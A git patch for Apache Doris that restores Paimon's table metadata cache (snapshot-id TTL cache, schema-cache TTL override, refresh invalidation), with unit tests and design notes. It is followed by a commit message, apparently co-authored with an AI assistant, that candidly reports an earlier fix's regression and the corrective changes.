a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorProvider.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorProvider.java index 882b478446754b..f55e07e402e307 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorProvider.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorProvider.java @@ -40,11 +40,11 @@ public class PaimonConnectorProvider implements ConnectorProvider { private static final Logger LOG = LogManager.getLogger(PaimonConnectorProvider.class); - // Legacy PaimonExternalCatalog.checkProperties validated these table-handle cache knobs - // (meta.cache.paimon.table.{enable,ttl-second,capacity}) via CacheSpec. On the plugin path they are dead: - // a cut-over paimon table reports meta-cache engine "default" (not "paimon"), so it never reaches - // PaimonExternalMetaCache, which these keys size. Re-imposing CacheSpec validation would only reject malformed - // values for a knob that no longer does anything; instead warn the operator the keys are ignored (R2). + // Legacy PaimonExternalCatalog.checkProperties validated the table-handle cache knobs + // (meta.cache.paimon.table.{enable,ttl-second,capacity}) via CacheSpec. FIX-4 restores ttl-second: it now + // sizes the connector latest-snapshot cache (data) AND the generic schema cache (via + // schemaCacheTtlSecondOverride). enable/capacity remain not-wired on the plugin path, so they are still + // reported as ignored (R2) — ttl-second is intentionally excluded from this set since it again takes effect. private static final String DEAD_TABLE_CACHE_PREFIX = "meta.cache.paimon.table."; @Override @@ -79,6 +79,8 @@ public void validateProperties(Map properties) { private static void warnIgnoredDeadTableCacheKeys(Map properties) { List dead = properties.keySet().stream() .filter(k -> k.startsWith(DEAD_TABLE_CACHE_PREFIX)) + // ttl-second is restored (FIX-4): it sizes the snapshot cache + schema cache TTL, so it is NOT dead. + .filter(k -> !k.equals(PaimonConnector.TABLE_CACHE_TTL_SECOND)) .sorted() .collect(Collectors.toList()); if (!dead.isEmpty()) { diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonLatestSnapshotCache.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonLatestSnapshotCache.java new file mode 100644 index 00000000000000..ba79a865b725a6 --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonLatestSnapshotCache.java @@ -0,0 +1,117 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.paimon.catalog.Identifier; + +import java.util.Map; +import java.util.concurrent.ConcurrentHashMap; +import java.util.concurrent.TimeUnit; +import java.util.function.LongSupplier; + +/** + * Per-catalog cache of a paimon table's LATEST snapshot id, keyed by {@link Identifier} (db.table). + * + *

    Restores the legacy {@code PaimonExternalMetaCache} table-cache semantics that the SPI cutover dropped + * (FIX-4 / CI 973411 test_paimon_table_meta_cache): within the TTL a paimon catalog serves a STABLE + * (possibly stale) latest-snapshot id across queries, so a query-begin pin + * ({@link PaimonConnectorMetadata#beginQuerySnapshot}) reads the SAME snapshot until the entry expires or is + * invalidated by {@code REFRESH TABLE}/{@code REFRESH CATALOG}. The id flows through + * {@code applySnapshot} -> {@code scan.snapshot-id} -> {@code Table.copy}, so an external write made + * after the pin is not visible until refresh. + * + *

    TTL is {@code meta.cache.paimon.table.ttl-second}: {@code <= 0} disables caching (every read goes live, + * matching the legacy "no-cache" catalog). Expiry is access-based (legacy used Caffeine + * {@code expireAfterAccess(external_cache_expire_time_seconds_after_access)}). The keyspace (tables in one + * catalog) is naturally small; a best-effort size bound flushes wholesale on overflow (re-reads are harmless + * — the value is the live latest id). Lives on the long-lived per-catalog {@link PaimonConnector}, mirroring + * {@link PaimonSchemaAtMemo}; a REFRESH CATALOG rebuilds the connector and thus the cache. + */ +final class PaimonLatestSnapshotCache { + + private static final class Entry { + final long snapshotId; + volatile long expireAtNanos; + + Entry(long snapshotId, long expireAtNanos) { + this.snapshotId = snapshotId; + this.expireAtNanos = expireAtNanos; + } + } + + private final Map cache = new ConcurrentHashMap<>(); + private final long ttlNanos; + private final int maxSize; + private final LongSupplier nanoClock; + + PaimonLatestSnapshotCache(long ttlSeconds, int maxSize) { + this(ttlSeconds, maxSize, System::nanoTime); + } + + /** Visible for testing: injectable clock so TTL expiry is deterministic without sleeping. */ + PaimonLatestSnapshotCache(long ttlSeconds, int maxSize, LongSupplier nanoClock) { + this.ttlNanos = ttlSeconds <= 0 ? 0L : TimeUnit.SECONDS.toNanos(ttlSeconds); + this.maxSize = Math.max(1, maxSize); + this.nanoClock = nanoClock; + } + + /** Caching is on only when the TTL is positive; ttl-second <= 0 means "always read live". */ + boolean isEnabled() { + return ttlNanos > 0; + } + + /** + * Returns the cached latest-snapshot id for {@code identifier} if present and unexpired, else runs + * {@code loader} (the live {@code latestSnapshotId} read), caches the result and returns it. When caching + * is disabled ({@link #isEnabled()} is false) {@code loader} runs every call and nothing is cached. A hit + * refreshes the entry's expiry (access-based). The loader runs OUTSIDE any lock; a concurrent same-key + * miss may load twice (harmless — the value is the current live id), mirroring {@link PaimonSchemaAtMemo}. + */ + long getOrLoad(Identifier identifier, LongSupplier loader) { + if (ttlNanos <= 0) { + return loader.getAsLong(); + } + long now = nanoClock.getAsLong(); + Entry hit = cache.get(identifier); + if (hit != null && now - hit.expireAtNanos < 0) { + hit.expireAtNanos = now + ttlNanos; + return hit.snapshotId; + } + long loaded = loader.getAsLong(); + if (cache.size() >= maxSize) { + cache.clear(); + } + cache.put(identifier, new Entry(loaded, now + ttlNanos)); + return loaded; + } + + /** Drops the cached entry for one table so the next read goes live (REFRESH TABLE). */ + void invalidate(Identifier identifier) { + cache.remove(identifier); + } + + /** Drops all cached entries. */ + void invalidateAll() { + cache.clear(); + } + + /** Test-only: current number of cached entries. */ + int size() { + return cache.size(); + } +} diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorCacheTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorCacheTest.java new file mode 100644 index 00000000000000..81d6fb3fd2844f --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorCacheTest.java @@ -0,0 +1,73 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Collections; +import java.util.HashMap; +import java.util.Map; +import java.util.OptionalLong; + +/** + * Tests PaimonConnector's FIX-4 cache knobs (CI 973411): the {@code meta.cache.paimon.table.ttl-second} + * mapping to the generic schema-cache TTL override (Axis B). The data-snapshot cache itself is covered by + * {@link PaimonLatestSnapshotCacheTest}; the end-to-end behavior is gated by the docker e2e. + */ +public class PaimonConnectorCacheTest { + + private static PaimonConnector connector(Map props) { + return new PaimonConnector(props, new RecordingConnectorContext()); + } + + private static Map props(String ttl) { + Map m = new HashMap<>(); + if (ttl != null) { + m.put(PaimonConnector.TABLE_CACHE_TTL_SECOND, ttl); + } + return m; + } + + @Test + public void schemaTtlOverrideAbsentWhenPropertyUnset() { + // No meta.cache.paimon.table.ttl-second -> no override -> the catalog keeps the engine-default schema + // cache TTL (the with-cache catalog: schema is cached). MUTATION: returning a value -> red. + Assertions.assertEquals(OptionalLong.empty(), + connector(Collections.emptyMap()).schemaCacheTtlSecondOverride()); + } + + @Test + public void schemaTtlOverrideZeroDisablesSchemaCache() { + // The no-cache catalog (meta.cache.paimon.table.ttl-second=0) must drive schema.cache.ttl-second=0 so + // its schema is served FRESH (Test 2 / L112 of test_paimon_table_meta_cache). MUTATION: not mapping + // ttl-second -> the no-cache catalog would serve stale schema -> red. + Assertions.assertEquals(OptionalLong.of(0L), connector(props("0")).schemaCacheTtlSecondOverride()); + } + + @Test + public void schemaTtlOverridePositiveIsPassedThrough() { + Assertions.assertEquals(OptionalLong.of(3600L), connector(props("3600")).schemaCacheTtlSecondOverride()); + } + + @Test + public void schemaTtlOverrideIgnoresUnparseableValue() { + // A malformed value must not break catalog schema caching; fall back to no override (engine default). + Assertions.assertEquals(OptionalLong.empty(), connector(props("not-a-number")).schemaCacheTtlSecondOverride()); + } +} diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonLatestSnapshotCacheTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonLatestSnapshotCacheTest.java new file mode 100644 index 00000000000000..6979c947ff4a21 --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonLatestSnapshotCacheTest.java @@ -0,0 +1,130 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.paimon.catalog.Identifier; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.concurrent.atomic.AtomicInteger; +import java.util.concurrent.atomic.AtomicLong; + +/** + * Unit tests for {@link PaimonLatestSnapshotCache} (FIX-4 data-snapshot caching, CI 973411). + * Uses an injectable nano-clock so TTL expiry is deterministic without sleeping. + */ +public class PaimonLatestSnapshotCacheTest { + + private static Identifier id() { + return Identifier.create("db", "t"); + } + + @Test + public void cachesWithinTtlAndServesStaleId() { + AtomicInteger loads = new AtomicInteger(); + AtomicLong now = new AtomicLong(0); + PaimonLatestSnapshotCache c = new PaimonLatestSnapshotCache(100, 1000, now::get); + + long first = c.getOrLoad(id(), () -> { + loads.incrementAndGet(); + return 1L; + }); + // Second read within TTL must return the CACHED id (1), NOT the new live id (2) -> this is what + // pins the with-cache catalog to the old snapshot after an external write. MUTATION: serving live + // every call -> returns 2 -> red. + long second = c.getOrLoad(id(), () -> { + loads.incrementAndGet(); + return 2L; + }); + Assertions.assertEquals(1L, first); + Assertions.assertEquals(1L, second, "within TTL the cached snapshot id must be served"); + Assertions.assertEquals(1, loads.get(), "the live loader must run exactly once within TTL"); + Assertions.assertTrue(c.isEnabled()); + } + + @Test + public void ttlZeroDisablesCachingAlwaysLive() { + AtomicInteger loads = new AtomicInteger(); + PaimonLatestSnapshotCache c = new PaimonLatestSnapshotCache(0, 1000); + c.getOrLoad(id(), () -> { + loads.incrementAndGet(); + return 1L; + }); + long second = c.getOrLoad(id(), () -> { + loads.incrementAndGet(); + return 2L; + }); + // ttl-second=0 (the no-cache catalog) must read live every time. MUTATION: caching despite ttl<=0 + // -> loads==1 / second==1 -> red. + Assertions.assertEquals(2L, second, "ttl-second=0 must always read the live id"); + Assertions.assertEquals(2, loads.get()); + Assertions.assertFalse(c.isEnabled()); + Assertions.assertEquals(0, c.size(), "ttl-second=0 must not store anything"); + } + + @Test + public void invalidateForcesReload() { + AtomicInteger loads = new AtomicInteger(); + AtomicLong now = new AtomicLong(0); + PaimonLatestSnapshotCache c = new PaimonLatestSnapshotCache(100, 1000, now::get); + c.getOrLoad(id(), () -> { + loads.incrementAndGet(); + return 1L; + }); + c.invalidate(id()); + // After REFRESH TABLE invalidation the next read goes live (sees 2). MUTATION: invalidate not + // clearing -> returns cached 1 / loads==1 -> red. + long after = c.getOrLoad(id(), () -> { + loads.incrementAndGet(); + return 2L; + }); + Assertions.assertEquals(2L, after); + Assertions.assertEquals(2, loads.get()); + } + + @Test + public void expiresAfterTtlNanos() { + AtomicInteger loads = new AtomicInteger(); + AtomicLong now = new AtomicLong(0); + // ttl = 1 second -> 1e9 ns. + PaimonLatestSnapshotCache c = new PaimonLatestSnapshotCache(1, 1000, now::get); + c.getOrLoad(id(), () -> { + loads.incrementAndGet(); + return 1L; + }); + now.set(2_000_000_000L); // 2s later, past the 1s TTL + long after = c.getOrLoad(id(), () -> { + loads.incrementAndGet(); + return 2L; + }); + // MUTATION: never expiring -> returns 1 / loads==1 -> red. + Assertions.assertEquals(2L, after, "an entry past its TTL must be reloaded"); + Assertions.assertEquals(2, loads.get()); + } + + @Test + public void invalidateAllClearsEverything() { + AtomicLong now = new AtomicLong(0); + PaimonLatestSnapshotCache c = new PaimonLatestSnapshotCache(100, 1000, now::get); + c.getOrLoad(Identifier.create("db", "t1"), () -> 1L); + c.getOrLoad(Identifier.create("db", "t2"), () -> 2L); + Assertions.assertEquals(2, c.size()); + c.invalidateAll(); + Assertions.assertEquals(0, c.size()); + } +} diff --git a/fe/fe-core/src/main/java/org/apache/doris/catalog/RefreshManager.java b/fe/fe-core/src/main/java/org/apache/doris/catalog/RefreshManager.java index 8eddfdf860f577..7e07baf03bb638 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/catalog/RefreshManager.java +++ b/fe/fe-core/src/main/java/org/apache/doris/catalog/RefreshManager.java @@ -27,6 +27,7 @@ import org.apache.doris.datasource.ExternalDatabase; import org.apache.doris.datasource.ExternalObjectLog; import org.apache.doris.datasource.ExternalTable; +import org.apache.doris.datasource.PluginDrivenExternalCatalog; import org.apache.doris.datasource.hive.HMSExternalCatalog; import org.apache.doris.datasource.hive.HMSExternalTable; import org.apache.doris.datasource.hive.HiveExternalMetaCache; @@ -246,6 +247,13 @@ public void refreshTableInternal(ExternalDatabase db, ExternalTable table, long table.setUpdateTime(updateTime); } Env.getCurrentEnv().getExtMetaCacheMgr().invalidateTableCache(table); + // FIX-4: also drop any connector-side per-table cache (e.g. paimon's latest-snapshot cache) so the + // next read reflects the latest external state. Connector-agnostic (generic SPI no-op default); keyed + // by the REMOTE db/table names the connector uses. + if (table.getCatalog() instanceof PluginDrivenExternalCatalog) { + ((PluginDrivenExternalCatalog) table.getCatalog()).getConnector() + .invalidateTable(db.getRemoteName(), table.getRemoteName()); + } LOG.info("refresh table {}, id {} from db {} in catalog {}, update time: {}", table.getName(), table.getId(), db.getFullName(), db.getCatalog().getName(), updateTime); } diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/ExternalCatalog.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/ExternalCatalog.java index 780699343c1ade..d3a3293a2f85e9 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/ExternalCatalog.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/ExternalCatalog.java @@ -452,6 +452,16 @@ private void buildMetaCache() { } } + /** + * Hook for plugin/SPI catalogs to overlay DERIVED meta-cache config (e.g. a connector-provided schema-cache + * TTL) onto the EPHEMERAL property copy the engine uses to size the meta cache. Default no-op. MUST NOT + * mutate persisted catalog properties — the caller ({@code ExternalMetaCacheMgr.findCatalogProperties}) + * passes a throwaway copy, so SHOW CREATE CATALOG is unaffected. Connector-agnostic: the base does nothing; + * {@code PluginDrivenExternalCatalog} delegates to the connector SPI. + */ + public void overlayMetaCacheConfig(Map metaCacheProperties) { + } + // check if all required properties are set when creating catalog public void checkProperties() throws DdlException { // check refresh parameter of catalog diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/ExternalMetaCacheMgr.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/ExternalMetaCacheMgr.java index 9c4b4d5e206f36..ab6fefa8949447 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/ExternalMetaCacheMgr.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/ExternalMetaCacheMgr.java @@ -334,10 +334,16 @@ private Map findCatalogProperties(long catalogId) { if (catalog == null) { return null; } - if (catalog.getProperties() == null) { - return Maps.newHashMap(); + Map props = catalog.getProperties() == null + ? Maps.newHashMap() + : Maps.newHashMap(catalog.getProperties()); + // Let a plugin/SPI catalog overlay DERIVED meta-cache config (e.g. a connector-provided schema-cache + // TTL) onto this EPHEMERAL copy used to size the cache. Connector-agnostic (virtual dispatch; the base + // ExternalCatalog is a no-op) and non-persisting (this copy is throwaway -> no SHOW CREATE leak). + if (catalog instanceof ExternalCatalog) { + ((ExternalCatalog) catalog).overlayMetaCacheConfig(props); } - return Maps.newHashMap(catalog.getProperties()); + return props; } private void logMissingCatalogSkip(long catalogId, String operation) { diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java index 6014d607100e37..e84dd9f4e55968 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java @@ -50,6 +50,7 @@ import java.util.Locale; import java.util.Map; import java.util.Optional; +import java.util.OptionalLong; /** * An {@link ExternalCatalog} backed by a Connector SPI plugin. @@ -252,6 +253,29 @@ public Connector getConnector() { return connector; } + /** + * FIX-4: let the connector's own cache knob also govern the schema cache (restoring the legacy single-knob + * semantics — e.g. paimon's {@code meta.cache.paimon.table.ttl-second} sized the whole table cache, schema + * included). Applied to the engine's EPHEMERAL cache-sizing property copy only (never persisted). An + * explicit user {@code schema.cache.ttl-second} wins. Uses the {@code connector} field directly (no forced + * init / no throw): this hook only runs during a cache read, by which point the catalog is already + * initialized; a null connector (uninitialized or concurrently dropped) simply leaves the engine default. + */ + @Override + public void overlayMetaCacheConfig(Map metaCacheProperties) { + if (metaCacheProperties.containsKey(SCHEMA_CACHE_TTL_SECOND)) { + return; + } + Connector localConnector = connector; + if (localConnector == null) { + return; + } + OptionalLong override = localConnector.schemaCacheTtlSecondOverride(); + if (override.isPresent()) { + metaCacheProperties.put(SCHEMA_CACHE_TTL_SECOND, String.valueOf(override.getAsLong())); + } + } + /** * Routes {@code CREATE TABLE} through the SPI's * {@code ConnectorTableOps.createTable(session, request)} instead of the diff --git a/plan-doc/fix-973411-4-paimon-meta-cache-design.md b/plan-doc/fix-973411-4-paimon-meta-cache-design.md new file mode 100644 index 00000000000000..1cb277ef9b5406 --- /dev/null +++ b/plan-doc/fix-973411-4-paimon-meta-cache-design.md @@ -0,0 +1,63 @@ +# FIX-4 — test_paimon_table_meta_cache: restore paimon table cache (data snapshot + schema TTL) + +## Problem +CI 973411 `test_paimon_table_meta_cache` fails. Two independent assertions break because the SPI migration split +the legacy single paimon table cache (one `meta.cache.paimon.table.ttl-second` knob covered BOTH data snapshot +AND schema) across two SPI mechanisms with different knobs: +- **L79 (with-cache, data):** SPI has NO snapshot cache, so the with-cache catalog sees an external INSERT + immediately (expected 1, got 2). +- **L112 (no-cache, schema):** SPI routes paimon schema to the generic schema cache keyed by + `schema.cache.ttl-second` (default 86400), which `meta.cache.paimon.table.ttl-second=0` does NOT disable, so + the no-cache catalog serves stale schema (expected 3, got 2). + +## Root Cause +`PaimonConnectorProvider` marked `meta.cache.paimon.table.*` "dead" at cutover. `beginQuerySnapshot` reads the +LATEST snapshot id live every query (no cross-query pin), and the schema cache TTL is the generic +`schema.cache.ttl-second`, unaffected by the paimon knob. SPI regression (the unchanged test encodes master). + +## Design (two axes, connector-agnostic fe-core) +Confirmed end-to-end that the query-begin snapshot id controls normal reads: +`materializeLatest -> beginQuerySnapshot -> PluginDrivenScanNode.pinMvccSnapshot -> applySnapshot -> +scan.snapshot-id -> resolveScanTable Table.copy`. + +**Axis A — data snapshot cache:** +- New `PaimonLatestSnapshotCache` (per-catalog, on the long-lived `PaimonConnector`): TTL cache of latest + snapshot id keyed by `Identifier(db,table)`, sized by `meta.cache.paimon.table.ttl-second` (legacy default + 86400; `<= 0` disables -> always live = the no-cache catalog). Access-based expiry; injected into + `PaimonConnectorMetadata` (5-arg ctor; 3/4-arg ctors get a disabled cache so existing tests are unchanged). +- `beginQuerySnapshot` serves the id through the cache (live read only on a miss). +- New `Connector.invalidateTable(db,tbl)` / `invalidateAll()` SPI default no-ops; `PaimonConnector` overrides + them to invalidate the cache (keyed by REMOTE names, matching the handle). +- `RefreshManager.refreshTableInternal` calls `connector.invalidateTable(db.getRemoteName(), + table.getRemoteName())` for any `PluginDrivenExternalCatalog` (generic; no source-specific code). REFRESH + CATALOG already rebuilds the connector (cache gone). + +**Axis B — schema cache TTL:** +- New `Connector.schemaCacheTtlSecondOverride()` SPI default `OptionalLong.empty()`; `PaimonConnector` returns + `meta.cache.paimon.table.ttl-second` when set. +- New generic `ExternalCatalog.overlayMetaCacheConfig(props)` no-op hook; `PluginDrivenExternalCatalog` + overrides it to set `schema.cache.ttl-second` = the connector override (only if the user didn't set it). +- `ExternalMetaCacheMgr.findCatalogProperties` calls the hook on its EPHEMERAL property copy (no persisted + mutation -> no SHOW CREATE leak). REFRESH TABLE already invalidates the schema cache entry. + +`meta.cache.paimon.table.{enable,capacity}` remain not-wired (still reported ignored); `ttl-second` is removed +from the "dead keys" warning since it again takes effect. + +## Risk Analysis +Snapshot pinning stability across queries (within TTL) is the legacy behavior restored — a deliberate, faithful +semantic. fe-core stays connector-agnostic (virtual dispatch; base no-ops). The overlay never mutates persisted +properties. `connector`-field reads are null-guarded (dropped/uninitialized -> engine default). Only fully +verifiable via docker e2e (cross-query cache + external writes); offline UTs cover the cache + the override map. + +## Test Plan +### Unit +- `PaimonLatestSnapshotCacheTest`: caches within TTL, ttl=0 bypasses, invalidate/invalidateAll clear, expiry + (injectable clock). RED/GREEN on the cache logic. +- `PaimonConnectorCacheTest`: `schemaCacheTtlSecondOverride()` maps the knob (absent->empty, 0->of(0), + N->of(N), garbage->empty). +- Regression: PaimonConnectorMetadataMvccTest (beginQuerySnapshot), ValidateProperties, fe-core compile + + PluginDrivenMvccExternalTableTest / ListPartitionItemTest. + +### E2E +`test_paimon_table_meta_cache.groovy` under docker `enablePaimonTest=true` (currently RED; expected GREEN) — +the real gate for the cross-query data cache + schema TTL + refresh. diff --git a/plan-doc/fix-973411-4-paimon-meta-cache-summary.md b/plan-doc/fix-973411-4-paimon-meta-cache-summary.md new file mode 100644 index 00000000000000..58d9547d9f187a --- /dev/null +++ b/plan-doc/fix-973411-4-paimon-meta-cache-summary.md @@ -0,0 +1,32 @@ +# FIX-4 Summary — restore paimon table cache (data snapshot + schema TTL) + +## Problem +CI 973411 `test_paimon_table_meta_cache` fails on two assertions: L79 (with-cache catalog sees an external +INSERT immediately) and L112 (no-cache catalog serves stale schema). The SPI migration split the legacy single +`meta.cache.paimon.table.ttl-second` knob (which covered data snapshot AND schema) and dropped the data cache. + +## Root Cause +`beginQuerySnapshot` read the latest snapshot id live every query (no cross-query pin); the schema cache TTL is +the generic `schema.cache.ttl-second`, unaffected by the paimon knob. SPI regression (test unchanged from master). + +## Fix (two axes, fe-core stays connector-agnostic) +**Axis A (data):** new `PaimonLatestSnapshotCache` on `PaimonConnector` (TTL = `meta.cache.paimon.table.ttl-second`, +default 86400, `<=0` disables); `beginQuerySnapshot` serves the id through it (the id flows to `scan.snapshot-id` +via `applySnapshot`, confirmed end-to-end). New `Connector.invalidateTable/invalidateAll` SPI no-ops; paimon +overrides them; `RefreshManager.refreshTableInternal` invalidates any `PluginDrivenExternalCatalog`'s connector +(REFRESH CATALOG already rebuilds it). +**Axis B (schema):** new `Connector.schemaCacheTtlSecondOverride()` SPI (paimon returns the knob); new generic +`ExternalCatalog.overlayMetaCacheConfig` hook (PluginDrivenExternalCatalog delegates to the connector); +`ExternalMetaCacheMgr.findCatalogProperties` applies it to its EPHEMERAL copy (no SHOW CREATE leak). REFRESH +TABLE already invalidates the schema cache. +`ttl-second` removed from the "dead keys" warning; `enable`/`capacity` remain not-wired (still reported ignored). + +## Tests +- `PaimonLatestSnapshotCacheTest` 5/5 (cache within TTL, ttl=0 bypass, invalidate, expiry via injected clock). +- `PaimonConnectorCacheTest` 4/4 (`schemaCacheTtlSecondOverride` mapping). +- Regression: PaimonConnectorMetadataMvccTest 40/40, ValidateProperties 14/14; fe-core compile + + PluginDrivenMvccExternalTableTest (FIX-2) + ListPartitionItemTest (FIX-3). + +## Result +Offline UTs + compile verified. The cross-query data cache + schema TTL + refresh behavior is gated by the +docker e2e (`enablePaimonTest=true` rerun of test_paimon_table_meta_cache), currently RED, expected GREEN. diff --git a/plan-doc/task-list.md b/plan-doc/task-list.md index fafe57100e26d3..b5d1746834de39 100644 --- a/plan-doc/task-list.md +++ b/plan-doc/task-list.md @@ -6,6 +6,6 @@ Build 973411, HEAD e1d6f88. All 4 test files are byte-identical to master ⇒ al - [x] FIX-1 — test_create_paimon_table: paimon-over-HMS create-db classloader split (PaimonCatalogFactory.assembleHiveConf) — DONE (16/16 UT, checkstyle clean) - [x] FIX-2 — test_mysql_mtmv: connector-null NPE during mv_infos scan (PluginDrivenMvccExternalTable.materializeLatest) — DONE (36/36 UT, RED reproduced exact NPE, checkstyle clean) - [x] FIX-3 — test_paimon_mtmv: Duplicated p_NULL partition naming (ListPartitionItem.toPartitionKeyDesc) — DONE (2/2 new UT + MTMV 10/10, RED reproduced p_NULL collision, checkstyle clean) -- [ ] FIX-4 — test_paimon_table_meta_cache: restore paimon table snapshot cache (PaimonConnector + Connector SPI + fe-core refresh wiring) +- [x] FIX-4 — test_paimon_table_meta_cache: restore paimon table cache, 2 axes (PaimonConnector snapshot cache + Connector SPI invalidate/schemaTtl + fe-core overlay/refresh wiring) — DONE (cache 5/5, override 4/4, Mvcc 40/40, fe-core compiles + FIX-2/3 guards 36/2, checkstyle clean; e2e docker-gated) Order: 1 → 2 → 3 → 4 (smallest/lightest module first; #4 largest). TDD per fix, independent commit each. From 16b62559a2ac3ca7f6bbcfa844330452f5a334f2 Mon Sep 17 00:00:00 2001 From: morningman Date: Sat, 20 Jun 2026 12:34:51 +0800 Subject: [PATCH 127/128] =?UTF-8?q?fix:=20CI=20973469=20=E2=80=94=20paimon?= =?UTF-8?q?=20null-partition=20MTMV=20family=20+=20no-cache=20schema=20(re?= =?UTF-8?q?vert=20FIX-3)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Verification run for 973411's FIX-1..4. FIX-1/FIX-2 held; FIX-3 was itself a regression and FIX-4 did not fix its target. Two root causes, four failing suites (all test .out byte-identical to master -> master is the spec). Root causes: - FIX-3 (26a8ecd) patched only the genuine-null partition DISPLAY name on the SHARED ListPartitionItem.toPartitionKeyDesc. It never touched the MTMV refresh predicate (so test_paimon_mtmv still failed, now 5 rows vs master's 3), and it renamed hive's default partition p_NULL -> p_HIVEDEFAULTPARTITION, breaking test_hive_default_mtmv (asserts p_NULL) and test_upgrade_downgrade_mtmv (the MTMV.calculatePartitionMappings join needs both sides to render symmetrically). - The paimon bridge marked genuine-null isNull=true (1b0ae1ed), coupling two opposite needs through one flag: WHERE IS NULL prune wants true, MTMV refresh wants false (master PaimonUtil uses isNull=false unconditionally and loses the null data; IS NULL still works via the predicate-driven scan). - test_paimon_table_meta_cache: the SPI routes the latest schema through the generic name-keyed schema cache (no schemaId) whose TTL spec is frozen at first build (AbstractExternalMetaCache.initCatalog computeIfAbsent), so ttl-second=0 cannot bust it after an external ALTER -> stale schema. Fix (master parity; unit-tested, checkstyle clean; docker e2e still gated): - A1 revert FIX-3: ListPartitionItem.java restored byte-identical to master; ListPartitionItemTest now asserts the master p_NULL rendering. - A2 paimon bridge PluginDrivenMvccExternalTable.toListPartitionItem -> new PartitionValue(value, false), matching master PaimonUtil. The genuine-null MTMV partition is a StringLiteral sentinel (no p_NULL collision) and its refresh IN-predicate drops the null rows (3 rows, master parity). - A3 new connector capability ConnectorScanPlanProvider.ignorePartitionPruneShort Circuit() (default false; PaimonScanPlanProvider -> true), consulted by PluginDrivenScanNode.resolveRequiredPartitions: a predicate-driven connector maps a prune-to-zero to scan-all instead of the empty short-circuit. Required so WHERE col IS NULL still returns the genuine-null row under isNull=false (qt_null_partition_4) -- the branch short-circuits empty pruned sets where master's PaimonScanNode re-plans from the pushed predicate. - B PluginDrivenMvccExternalTable.getLatestSchemaCacheValue: when the connector disables its schema cache (schemaCacheTtlSecondOverride <= 0, the no-cache catalog) read the schema FRESH via initSchema(), bypassing the frozen name-keyed cache; the cached catalog keeps the cached path. Restores master's single-knob meta.cache.paimon.table.ttl-second=0 -> always-fresh-schema. Docker gate (enablePaimonTest/enableHiveTest=true): test_paimon_mtmv->3 rows; qt_null_partition_4->`1 \N 100.0` (must stay green); test_hive_default_mtmv-> p_NULL; test_upgrade_downgrade_mtmv->sync true; test_paimon_table_meta_cache-> no-cache desc 3 cols. Co-Authored-By: Claude Opus 4.8 (1M context) Claude-Session: 